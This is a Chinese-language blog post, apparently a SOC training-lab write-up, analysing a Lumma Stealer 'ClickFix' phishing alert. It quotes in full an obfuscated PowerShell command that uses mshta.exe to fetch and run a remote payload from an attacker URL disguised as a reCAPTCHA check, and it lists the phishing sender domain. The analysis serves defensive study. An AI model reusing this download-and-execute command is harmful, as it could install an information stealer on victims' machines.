一次恶意样本简易分析 | Lumma Stealer — 通过点击修复钓鱼进行 DLL 侧加载

admin

139164
文章

114
评论

2025年3月17日21:08:55评论10 views字数 1975阅读6分35秒阅读模式

扫码领资料

获网安教程

一次恶意样本简易分析 | Lumma Stealer — 通过点击修复钓鱼进行 DLL 侧加载

来Track安全社区投稿~

赢千元稿费！还有保底奖励~（https://bbs.zkaq.cn）

Lumma Stealer（也称为 LummaC2 Stealer）是一种用 C 语言编写的信息窃取工具，自 2022 年 8 月以来，已经通过一种名为“恶意软件即服务”（MaaS）的模式出现在俄罗斯语论坛上。它被认为是由威胁演员“Shamel”开发的，他的化名为“Lumma”。Lumma Stealer 主要针对加密货币钱包和双重身份验证（2FA）浏览器扩展，然后最终窃取受害者计算机上的敏感信息。一旦获得目标数据，它会通过 HTTP POST 请求将数据泄露到 C2 服务器，用户代理为 "TeslaBrowser/5.5"。该窃取工具还具有一个非驻留加载程序，能够通过 EXE、DLL 和 PowerShell 传递额外的有效负载。

让我们开始调查。

以下是我们收集到的线索。

-**EventID:**316-**EventTime:**Mar,13,2025,09:44 AM-**SMTP Address:**132.232.40.201-**SourceAddress:** update@windows-update.site-**DestinationAddress:** dylan@letsdefend.io-**E-mail Subject:**Upgrade your system to Windows11Profor FREE-**DeviceAction:**Allowed-**TriggerReason:**Redirected site contains a click fix type script forLummaStealer distribution.

分析

由于这是一个电子邮件，我们需要检查 “电子邮件安全” 页面，以分析是否存在任何可疑活动。

搜索 SMTP 地址

我们可以检查更新按钮重定向的 URL，以确定它是否指向恶意网站。为此，我将提交该 URL 到 VirusTotal 进行检测。

是的，它似乎是恶意的，一些供应商已将其标记为钓鱼网站。

接下来，我们可以检查“端点安全”页面，看看是否与该 URL 有过交互，或者系统是否遭到入侵。

在“终端历史”标签页中，我们可以看到已执行了 PowerShell 命令。

CopyC:Windowssystem32WindowsPowerShellv1.0PowerShell.exe" -w 1 powershell -Command ('ms]]]ht]]]a]]].]]]exe https://overcoatpassably.shop/Z8UZbPyVpGfdRS/maloy.mp4' -replace ']') # ✅ ''I am not a robot - reCAPTCHA Verification ID: 3824

该脚本旨在从远程服务器下载并执行文件。该命令使用 mshta.exe（Windows 的合法工具，用于运行 HTML 应用程序）从可疑 URL 获取文件。该 URL 通过插入额外的 ] 字符进行混淆，随后使用 -replace ']' 命令移除这些字符，以还原实际的 URL。一旦清理完成，命令会使用 mshta.exe 运行目标文件（maloy.mp4），该文件很可能包含恶意代码。这种技术通常用于在不被检测的情况下执行载荷。

这证实了攻击者已成功入侵系统并在其中执行了命令。

现在，让我们基于调查结果开始构建应对手册。